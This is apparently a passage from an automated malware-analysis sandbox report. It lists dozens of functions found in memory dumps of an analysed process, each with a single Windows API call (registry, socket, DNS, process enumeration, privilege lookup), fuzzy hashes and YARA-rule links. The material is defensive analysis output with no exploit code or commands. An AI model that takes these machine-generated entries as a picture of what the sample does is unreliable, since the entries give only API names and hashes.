Uniqueness

Uniqueness Score: -1.00%

Function 055601F4, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 05560264

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 3cca26beb70430e4fc99f800d62fb844cd67b99b31c969a9f4509d2d3c898570
Instruction ID: 118b9447edcc0c229efa1a97acd2396b1c9732249cdb5855f34388e9fa36dd3f
Opcode Fuzzy Hash: 3cca26beb70430e4fc99f800d62fb844cd67b99b31c969a9f4509d2d3c898570
Instruction Fuzzy Hash: 1821D7714097C4AFD712CB54DC89B51BFA8FF42224F0980DADD848F5A3D2349908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02C1AB3A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E90,842A7EE1,00000000,00000000,00000000,00000000), ref: 02C1ABB4

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: dd358622afd09a30c9a26a08ea643911dbefe953189a3cc4e6baf3216a6910a3
Instruction ID: a8a59171dcb3335f1fd1c4e52c4f858c547ec5c380c625578ca7f9f8e41d9c45
Opcode Fuzzy Hash: dd358622afd09a30c9a26a08ea643911dbefe953189a3cc4e6baf3216a6910a3
Instruction Fuzzy Hash: 3B218C71601644AFEB20CF25CC81F67FBECEF45710F04846AEE459B251D760E508DAB1

Uniqueness

Uniqueness Score: -1.00%

Function 05560FC0, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0556102C

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 6304220161b379c893bf9500b8ff2fbfbaf8f4415a462a60f763d4a783646a65
Instruction ID: ab23dac56df5c0892bb70a3c9c2fc2dc685e4e252b13b0b319074c9575d60c0e
Opcode Fuzzy Hash: 6304220161b379c893bf9500b8ff2fbfbaf8f4415a462a60f763d4a783646a65
Instruction Fuzzy Hash: D121A1725093C05FDB02CB25DC54A92BFA4AF43724F0980DAED858F663D275A948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05561C82, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05561CED

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 86346fbc17901a11a3a3fe2edd5b0b34dc5df28162915fdbc2717783e8f0d4e9
Instruction ID: e7bc58d0608c47f3051af00f4b1de373f5f9dff3d461dc896c2bb1d36c878588
Opcode Fuzzy Hash: 86346fbc17901a11a3a3fe2edd5b0b34dc5df28162915fdbc2717783e8f0d4e9
Instruction Fuzzy Hash: E621AC71504A40AFF720DF25CC85F6AFBA8FF45320F14846AEE898B242E275E505CA75

Uniqueness

Uniqueness Score: -1.00%

Function 05561075, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,842A7EE1,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 055610E6

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: dba76f147285449934f5f3dbbce100b06a3a6b40fff5f381cd515a8064032555
Instruction ID: af000ab6a2b25274548eb0d7cc6e77fe61117cf5e84a999dd66a0d2c59681172
Opcode Fuzzy Hash: dba76f147285449934f5f3dbbce100b06a3a6b40fff5f381cd515a8064032555
Instruction Fuzzy Hash: C22180715093C49FDB12CF25DC84BA2BFF4EF06220F0984EAE985CF162D275A948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05561522, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 0556158E

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 31e30cea9586d185131f5c5bd20c90ae99b3df28fd291f9a16792a66fad97933
Instruction ID: b321f3787f23f2d0ede1434da38650193b82693c9004d351d6c96651eb3f95c7
Opcode Fuzzy Hash: 31e30cea9586d185131f5c5bd20c90ae99b3df28fd291f9a16792a66fad97933
Instruction Fuzzy Hash: F021BB71500640AFEB21CF65D944F66FBE9FF04310F04886AEA858B641D7B1A408CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05561D82, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 05561DF6

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 364d4d019dbef75ce347e916853af63527a14454af8a542f0c3076ca7e76063c
Instruction ID: ee0c42541abd460a1cf05e00c0828b83565e41ef7ceabed89917c85a45ad3b18
Opcode Fuzzy Hash: 364d4d019dbef75ce347e916853af63527a14454af8a542f0c3076ca7e76063c
Instruction Fuzzy Hash: 6021AC71500640AFE721CF25DC84FA6FFE9FF08320F04845AEA889B241D775E949CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 055604EA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E90,842A7EE1,00000000,00000000,00000000,00000000), ref: 0556055C

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: b649c87480ff6b6065bbe7fa163a99e81a410800937a4e7e82146f60c1acabab
Instruction ID: 7a280af73c2fd50eb2bed7e3080a389bea73012318773749a06650347ba2d43f
Opcode Fuzzy Hash: b649c87480ff6b6065bbe7fa163a99e81a410800937a4e7e82146f60c1acabab
Instruction Fuzzy Hash: 05117C72500644EFEB21CF15DC84F67FBE8FF14720F04846AEA469B2A1D664E849CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 055621EE, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E90,842A7EE1,00000000,00000000,00000000,00000000), ref: 0556224D

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 8b96ab2ece692f915d709f114ed61c91aa3750a63767badd9ae59c029871d1a3
Instruction ID: 4474dee20b03c56f6706ff38b5b3ba42bdb4ed5897cc3b0eb6c2cfffc64d946d
Opcode Fuzzy Hash: 8b96ab2ece692f915d709f114ed61c91aa3750a63767badd9ae59c029871d1a3
Instruction Fuzzy Hash: 2A11D072500200AFEB21CF55DC85F6BFBA8EF05320F04886AEE458B251D674A414CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 05560CEC, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 05560D56

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d785721bba6155bc8cfbef67e3c94549566859bf6481b37cb9241e3fafbf433e
Instruction ID: e1938fcd1df7aa87ab6be079f05afe8bc7ef68ce1f6ce22d06b1b8d7ecc7b70b
Opcode Fuzzy Hash: d785721bba6155bc8cfbef67e3c94549566859bf6481b37cb9241e3fafbf433e
Instruction Fuzzy Hash: 20116075509380AFDB51CF25DC85B56BFE8EF45210F0885AAED49CB262D274E844CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02C1B7CA, Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 02C1B841

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5737a1aac485471d7b74f909fe86c68484b4bd4e8e24a76f43dbcc42caed42bc
Instruction ID: 316ab7ce91855fc1f5020835e0979ad885ff1b8352e5fda3c9d61f956639a010
Opcode Fuzzy Hash: 5737a1aac485471d7b74f909fe86c68484b4bd4e8e24a76f43dbcc42caed42bc
Instruction Fuzzy Hash: DD2190714097C09FDB128B21DC51AA2BFB0EF47314F0D84DAEDC44F163D265A958DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02C1A51F, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C1A58A

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a6a2cf70e9e90a2cb612e22fd099d06598585100c51df29edffac80029c749b3
Instruction ID: 3f43dabce0bb73e184f8004b89f59be1df2dad8600312cf8b9155e858c911723
Opcode Fuzzy Hash: a6a2cf70e9e90a2cb612e22fd099d06598585100c51df29edffac80029c749b3
Instruction Fuzzy Hash: 37118471409780AFDB228F55DC44B62FFF4EF4A310F0884DAEE858B152D375A518DB61

Uniqueness

Uniqueness Score: -1.00%

Function 05560AD6, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?,00000E90), ref: 05560B3F

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: d6f952c32b2d9a22b903985a52fdc002ad61f864c8ad1f909fbe0a58f39fb3d3
Instruction ID: c9508138fce4d7b29cc7ba7a414f45604843d75d274c6da1ec85fff840c9f4b9
Opcode Fuzzy Hash: d6f952c32b2d9a22b903985a52fdc002ad61f864c8ad1f909fbe0a58f39fb3d3
Instruction Fuzzy Hash: 0A110671100300AFF720CB19DC85F7AFB98EF05720F14C46AEE459B2A1D6A4A944CB71

Uniqueness

Uniqueness Score: -1.00%

Function 055602DE, Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,00000E90), ref: 05560353

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 1acd295b58336339bcd00ff0cc28c8633f188f43a42578843860e0a850c4af2a
Instruction ID: de08bd59125835182082bc543836705250a432961c92e2afff6fa0efe02df790
Opcode Fuzzy Hash: 1acd295b58336339bcd00ff0cc28c8633f188f43a42578843860e0a850c4af2a
Instruction Fuzzy Hash: F211EF31100700EFEB21CF14CC45F66FBA8FF04710F14849AEE455B291C2B5A949CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 055609F2, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E90,842A7EE1,00000000,00000000,00000000,00000000), ref: 05560A51

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: b3227d8f875a861601774f7724e0db554b06519fa67fad571a279642e139bda3
Instruction ID: ee5b9bf3490a3572d750ae349594cf0b80fedac890e8e50b1649afdb234a9cfa
Opcode Fuzzy Hash: b3227d8f875a861601774f7724e0db554b06519fa67fad571a279642e139bda3
Instruction Fuzzy Hash: EF11BF71400240EFEB21CF55DC85F6AFBA8EF44320F14886BEE499B651D275A408CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02C1BB4F, Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 02C1BBB9

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 350bf5def4922e6819561207e56ebeaec108a693bb28f64653aea2636952992b
Instruction ID: 8e7c0cb677aa0be5e440fcf97fe0c342a7ecc961322744a7c2ed8e98cfdf34fc
Opcode Fuzzy Hash: 350bf5def4922e6819561207e56ebeaec108a693bb28f64653aea2636952992b
Instruction Fuzzy Hash: 8111D0354093C0AFDB228F25CC45B52FFB4EF06220F0884DEED858B563D265A958DB62

Uniqueness

Uniqueness Score: -1.00%

Function 02C1BE05, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 02C1BE70

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: e86527149909ec6eb9cda851e2213f2c02ab6e5c95b6db708ceacaafb79fd5c7
Instruction ID: 8fbee98d127af4af4967dc5a9295a67a2408c5b4126f991c8382724b370bfd73
Opcode Fuzzy Hash: e86527149909ec6eb9cda851e2213f2c02ab6e5c95b6db708ceacaafb79fd5c7
Instruction Fuzzy Hash: 961181754093C0AFDB138B25DC44B61FFB4DF47624F0984DADD844F253D2655948DB62

Uniqueness

Uniqueness Score: -1.00%

Function 02C1B71E, Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32 ref: 02C1B78A

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 50779383a6fcb329296162ffe9e80a21334f72b393a19103231dc5312d693329
Instruction ID: 22017e43e0872b5d4c1c35bdfde3dfbcd373401299df1a18283824b9845e9322
Opcode Fuzzy Hash: 50779383a6fcb329296162ffe9e80a21334f72b393a19103231dc5312d693329
Instruction Fuzzy Hash: 11118E31408380AFDB22CF54D884A52FFF4EF46210F08849AEA858B522D375A558DB61

Uniqueness

Uniqueness Score: -1.00%

Function 05560B83, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 05560BE8

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: e8ea3d609a2d0076722f8101201865d1b33bc76d1d61c51cfeed435a6fcdf0a8
Instruction ID: 2ee692e462c96799d1cecb6b0fc53df0125a354fb3a752ac2d0d3bbd1f019368
Opcode Fuzzy Hash: e8ea3d609a2d0076722f8101201865d1b33bc76d1d61c51cfeed435a6fcdf0a8
Instruction Fuzzy Hash: A8115E714093C4AFD7128B25DC45B52FFB4EF42224F0984DBED888F163D279A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02C1BEB4, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 02C1BF0C

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 77978a611b35c898f62a4f13c6b68f1552b83e64fcc37642666a21ae826c1d3a
Instruction ID: 73e43f628f53aed787381dacb69a888cccc9deed9094cd0b3d0dc29721e7682a
Opcode Fuzzy Hash: 77978a611b35c898f62a4f13c6b68f1552b83e64fcc37642666a21ae826c1d3a
Instruction Fuzzy Hash: E8118C71509380AFDB11CF25DC85B56FFE8EF42224F0884EAED49CB252D275E948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05560D0E, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 05560D56

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: e1e8eaae2789f2868ff59a0f95decdea0a2f03458406a02851b6cd377b765923
Instruction ID: 9fdf43516c32e38618363ff512a0ba9d08a5339842a39354cf43f294fbed70ed
Opcode Fuzzy Hash: e1e8eaae2789f2868ff59a0f95decdea0a2f03458406a02851b6cd377b765923
Instruction Fuzzy Hash: 8F1161756046809FDB50CF29D889B66FBE8FF04720F0885AADD49CB296D675E404CA71

Uniqueness

Uniqueness Score: -1.00%

Function 0556075A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 0556079F

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 18abec3a53563904ccb8972e6ecd6a5786900fed60b8569d92fb1b8863dd2f24
Instruction ID: d8eebecf8d4b7edaf8240c70b9fe85e7de24ed9d00ea39bc746ec2f3811989d1
Opcode Fuzzy Hash: 18abec3a53563904ccb8972e6ecd6a5786900fed60b8569d92fb1b8863dd2f24
Instruction Fuzzy Hash: 361184756042449FDB50CF29D88DB66FBD8FF04220F08C4AADD09DB692E675E444CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05560932, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E90,842A7EE1,00000000,00000000,00000000,00000000), ref: 05560985

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: fec4fef7d5746e4c107055c8bed1178538b30c90fa918ac3e8b452b1b65c8b95
Instruction ID: b04c2cc3183521ee11b2e5bde15aef28a02c56d78c5a76b45abeb07d175b3bdf
Opcode Fuzzy Hash: fec4fef7d5746e4c107055c8bed1178538b30c90fa918ac3e8b452b1b65c8b95
Instruction Fuzzy Hash: A801D271500744EFE710DB19DC85F77FBA8EF45720F148497EE449B291C6B4A448CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 02C1A75B, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 02C1A7BC

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 1ba52aad4c1d93e0678b407ae56140f10e595a3847a962695f21bc01b2d96598
Instruction ID: 657186e597767d113ce1aa529d4d10755326ed04283462a52c3c6d183beeb390
Opcode Fuzzy Hash: 1ba52aad4c1d93e0678b407ae56140f10e595a3847a962695f21bc01b2d96598
Instruction Fuzzy Hash: 9511A071449384AFDB12CF15DC85B52BFB4EF46224F0884DAED489F253D375A548CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 055610A6, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,842A7EE1,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 055610E6

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 0c76e52175894aaefa94fc06e19226d212b137b1131e4a5832cb6456f02dd6b7
Instruction ID: 1dadb32b24cacd1a88c63e2d455609c3ece31d846f846b668d22dbcbeb32a9d2
Opcode Fuzzy Hash: 0c76e52175894aaefa94fc06e19226d212b137b1131e4a5832cb6456f02dd6b7
Instruction Fuzzy Hash: 7C1180756046849FDB20CF6AD885B66FBE4FF04320F08C4AADD49CB255D675E448CF62

Uniqueness

Uniqueness Score: -1.00%

Function 02C1A8CC, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 02C1A926

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: df4312154f7f437a39472ae8122d211ed7644d16046c0ee9724e92ea23157360
Instruction ID: 67f0a5c7ec865dc84dc5de702193a84b8b5b63f626ee6e57be359b859f995f37
Opcode Fuzzy Hash: df4312154f7f437a39472ae8122d211ed7644d16046c0ee9724e92ea23157360
Instruction Fuzzy Hash: 63118E31409784AFD722CF15DC85B52FFB4EF46220F0984DAEE894B262C375A958DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0556277A, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E90,?,?), ref: 055627CA

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: e68e8dcdef9859f34f20a1b0e330d4a13180caf6f9bc4d46759e380fdf2d68f5
Instruction ID: 0ba6e0e2ea22a63342510a54ef5332f9956d7266d5923f14d70054d524819e41
Opcode Fuzzy Hash: e68e8dcdef9859f34f20a1b0e330d4a13180caf6f9bc4d46759e380fdf2d68f5
Instruction Fuzzy Hash: 1F015E72500600AFD710DF16DD86B26FBA8EB84B20F14856AED089B741E375B915CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 02C1BED2, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 02C1BF0C

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: e5b861a2777974cc75e0971e13a4ebc564f39ea852a9f2903b301e3f7d85187c
Instruction ID: c27c9a7270e4face323f68d9bd491a5140cec3109db165665d28f743e23bf924
Opcode Fuzzy Hash: e5b861a2777974cc75e0971e13a4ebc564f39ea852a9f2903b301e3f7d85187c
Instruction Fuzzy Hash: 3401B1756002409FDB10CF2AD886766FBD8EF41224F0880AAED09CB642D675E908CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02C1A172, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E90,?,?), ref: 02C1A1C2

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 1e3d1b3f8f9312a76dafeac13e0742e05d88a3c20ba6aeadd1508db17cab7f0b
Instruction ID: e19fab1cef0e2562ed2c9a10a0ee42a1d05f0b0ab34444226ab721d517394ca8
Opcode Fuzzy Hash: 1e3d1b3f8f9312a76dafeac13e0742e05d88a3c20ba6aeadd1508db17cab7f0b
Instruction Fuzzy Hash: A6017171500600AFD710DF16DD86B26FBA8FB84B20F14856AED089B741E375F915CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 02C1A546, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C1A58A

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e2c59bb266fe576b7ba88b310e2f2bdf79842e56d9ddf9863bab9602caccdae4
Instruction ID: ddc6b90a7c8bc48ab1cac001f7fd9b150d37a507fbe043bebbd7590a68e315e0
Opcode Fuzzy Hash: e2c59bb266fe576b7ba88b310e2f2bdf79842e56d9ddf9863bab9602caccdae4
Instruction Fuzzy Hash: 4601AD31404A00EFDB21CF55D845B26FFE0EF48320F08849ADE494B612D376E018DF61

Uniqueness

Uniqueness Score: -1.00%

Function 02C1B746, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32 ref: 02C1B78A

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 5672407b7f41284cbced2ffbece9ab7fb7f364d0b57e2b2adfe7b37a700f52a1
Instruction ID: 51852ec26f97fdcb7739d6ff5d96f91254cfec675c0cf42922bb4e343ddd6cfa
Opcode Fuzzy Hash: 5672407b7f41284cbced2ffbece9ab7fb7f364d0b57e2b2adfe7b37a700f52a1
Instruction Fuzzy Hash: 20015B31400600EFDB21CF55D985B66FFA0EF49324F0885AAEE494A612D376A518DFB1

Uniqueness

Uniqueness Score: -1.00%

Function 05560232, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 05560264

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 5e29bc208b9444a312966d076a3b9b0ce5d4f3cec63ab9fe1a4fc86b17e3ca6b
Instruction ID: 4933499468401342b62c456c81729bd87b0c3b098bf1a1d299f32283f28b0948
Opcode Fuzzy Hash: 5e29bc208b9444a312966d076a3b9b0ce5d4f3cec63ab9fe1a4fc86b17e3ca6b
Instruction Fuzzy Hash: 96018F759042409FDB50CF69D989766FF94EF40320F08C4ABDD498B652D6B5E448CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 05560FFA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0556102C

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 77f662b3307dc1b51994ae255792dd6e76daf4e27c28b324e630919149167894
Instruction ID: 8d8a5354f498c54a100d1dad0448f4c864c6c2ee6caa2443e3012cef5ba298fa
Opcode Fuzzy Hash: 77f662b3307dc1b51994ae255792dd6e76daf4e27c28b324e630919149167894
Instruction Fuzzy Hash: 30017C715046809FDB10CF5AD985B66FBA4EF40720F1884AADD498B642D6B5A448CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 05561486, Relevance: 1.5, APIs: 1, Instructions: 43networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,00000E90,?,?), ref: 055614D6

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 960414356e5117d64be0c00c0362cec3f7b703abd18b0a1b01fc7b43737228f9
Instruction ID: 1901595038ddfa66bfe21a347a8fe7b12480ae1256ba2f52b4c4d381224eacf6
Opcode Fuzzy Hash: 960414356e5117d64be0c00c0362cec3f7b703abd18b0a1b01fc7b43737228f9
Instruction Fuzzy Hash: 9101AD72500600ABD310DF16DC82F22FBA8FBC8B20F14811AED084B741E371F926CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 02C1BB7E, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 02C1BBB9

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: db15fe74a6c6dcdc4b2a4acca7250f6ebfd4618cfef9a1aaceef0912bd2ff739
Instruction ID: 73ff071d2195796cd5d417d461cac182fec93964c055014f6f64ca99af0d330f
Opcode Fuzzy Hash: db15fe74a6c6dcdc4b2a4acca7250f6ebfd4618cfef9a1aaceef0912bd2ff739
Instruction Fuzzy Hash: 4301B135504600DFDB20CF16D885B66FFA0EF05324F08809AED494BA25C275E858DF61

Uniqueness

